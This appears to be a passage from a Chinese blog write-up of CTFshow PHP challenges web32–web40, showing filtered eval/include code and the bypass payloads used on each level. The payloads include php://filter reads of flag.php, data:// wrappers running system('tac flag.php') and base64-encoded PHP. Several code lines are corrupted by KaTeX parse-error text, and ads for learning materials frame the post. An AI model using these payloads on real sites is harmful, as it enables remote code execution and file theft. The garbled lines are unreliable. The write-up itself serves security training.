给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
highlight\_file(\_\_FILE\_\_);
}
**这里又过滤了反斜杠,`echo`,分号,括号 这里可以使用`include`函数可以不用括号 实现文件包含 配合伪协议 分号可以使用`>?` 代替**
**PS:我们只需要知道 过滤了参数可以使用代替进行绕过就行了这是做题的思路 还是很好理解的**
php://filter/read=convert.base64-encode/resource=flag.php #伪协议
?c=include_GET[cmd]>?&cmd=php://filter/read=convert.base64-encode/resource=flag.php
![在这里插入图片描述](https://img-blog.csdnimg.cn/f2f7f14a677b4e92bab3d44a8f7f395b.png)
>
> `ctfshow{22eca81d-7663-4150-bc72-57825852ad03}`
>
>
>
### web33:
error_reporting(0);
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|”/i", KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ eval(c);
}
}else{
highlight_file(__FILE__);
}
**过滤 了双引号 这里还是和上面那题一样的`Payload`就可以没啥新的知识点!**
?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php
![在这里插入图片描述](https://img-blog.csdnimg.cn/4d731aec65f34c8c8b6b9ded5ab8e8dc.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/b85a27b8091d48778df8ad4ffcce83bc.png)
>
> `ctfshow{34945d8a-89fa-48b8-919a-883dc71f740c}`
>
>
>
### web34:
error_reporting(0);
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|:|”/i", KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ eval(c);
}
}else{
highlight_file(__FILE__);
}
**这里多了冒号好像,这里也是一样的`Payload`,但是我们这里用别的伪协议`data://`进行测试**
?c=include%0aKaTeX parse error: Expected 'EOF', got '&' at position 12: _GET[cmd]?>&̲cmd=php://filte…_GET[cmd]?>&cmd=data://text/plan,<?php system("tac flag.php")?>
![在这里插入图片描述](https://img-blog.csdnimg.cn/3cf1c209d529426abd96e08073d3fac8.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/85cb04b7e1e048128135a28df3337ff1.png)
>
> `ctfshow{1378052e-d82c-446b-9e8d-5c1249ec1001}`
>
>
>
### web35:
error_reporting(0);
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|:|”|<|=/i", KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ eval(c);
}
}else{
highlight_file(__FILE__);
}
**过滤了,`=`号和`<`括号这里可以使用`data`的`base64` 把要执行的命令加密了传进去`<?php system("cat flag.php");?>`**
?c=include%0aKaTeX parse error: Expected 'EOF', got '&' at position 13: \_GET[cmd]?>&̲cmd=php://filte…_GET[cmd]?>&cmd=data://text/plan,<?php system("tac flag.php")?>
?c=include$_GET[cmd]?>&cmd=data://text/plan;base64;PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
#到这里有三种方法可以使用
![在这里插入图片描述](https://img-blog.csdnimg.cn/4fd91896be8641b2b1864ab5b9e06578.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/12582839299649219581ab097630025e.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/6cf5cfa136af4351ad0b43663b26162a.png)
>
> `ctfshow{2529c316-96d3-442b-9642-2135d3cb9904}`
>
>
>
### web36:
error_reporting(0);
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/flag|system|php|cat|sort|shell|.| |'|`|echo|;|(|:|”|<|=|/|[0-9]/i", KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ eval(c);
}
}else{
highlight_file(__FILE__);
}
**这里过滤了数字`0-9` 还是可以使用上面的`PayLoad`只要传参的不是数字就行**
?c=include%0aKaTeX parse error: Expected 'EOF', got '&' at position 12: _GET[cmd]?>&̲cmd=php://filte…_GET[cmd]?>&cmd=data://text/plan,<?php system("tac flag.php")?>
![在这里插入图片描述](https://img-blog.csdnimg.cn/4720294f8d8e476895be817c9563f368.png)
>
> `ctfshow{ece6bc01-4a5c-4d30-b638-c8e77800d3f5}`
>
>
>
### web37:
error_reporting(0);
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/flag/i”, KaTeX parse error: Expected '}', got 'EOF' at end of input: … include(c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
**这里过滤了`flag` 有文件包含了 可以使用伪协议**
?c=php://filter/read=convert.base64-encode/resource=flag.php #这里过滤了flag不要使用这一条没用 我只是都想测一遍用下面两个
?c=data://text/palin,<?php system("tac f\*");?>
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZioiKTs/Pg==
![在这里插入图片描述](https://img-blog.csdnimg.cn/0d72c1814f664032a8857ed60eae8c98.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/74af52429ce74f738da3919758052fbe.png)
>
> `ctfshow{472ace50-bae6-472b-b9a3-1c9631a2c34d}`
>
>
>
### web38:
//flag in flag.php
error_reporting(0);
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/flag|php|file/i”, KaTeX parse error: Expected '}', got 'EOF' at end of input: … include(c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
**这里过滤了`php`和`file` 所以可以使用短标签`‘<?=’`是PHP的一个短的开放式标签**
?c=data://text/palin,<?php system("tac f\*");?> #(使用不了用第二个我只是进行对比)这里php被过滤了使用不了可以改为短标签
?c=data://text/palin,<?=system("tac f\*");?>
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZioiKTs/Pg==
![在这里插入图片描述](https://img-blog.csdnimg.cn/09132f2f0e034c00acf6d59f88f80352.png)
>
> `ctfshow{42276d5b-2bb2-419a-9eba-7d93704753dd}`
>
>
>
### web39:
error_reporting(0);
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/flag/i”, KaTeX parse error: Expected '}', got 'EOF' at end of input: … include(c.“.php”);
}
}else{
highlight_file(__FILE__);
}
?c=data://text/palin,<?=system("tac f\*");?>
?c=data://text/palin,<?php system("tac f\*");?>
![在这里插入图片描述](https://img-blog.csdnimg.cn/53967fdcce9c4cd18ef7b1b05f713ac1.png)
>
> `ctfshow{831f530f-d4d3-4ae5-91e7-1e8093d194e8}`
>
>
>
### web40:
if(isset($_GET[‘c’])){
$c = $_GET[‘c’];
if(!preg_match(“/[0-9]|~|`|@|#|\$|%|^|&|\*|\(|\)|-|=|+|{|[|]|}|:|'|”|,|<|.|>|/|?|\\/i", KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ eval(c);
}
}else{
highlight_file(__FILE__);
}
**过滤了很多字符 有大写得括号 这里得考点是:无参数文件读取**
### 给大家的福利
**零基础入门**
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)
同时每个成长路线对应的板块都有配套的视频提供:
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)
因篇幅有限,仅展示部分资料
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**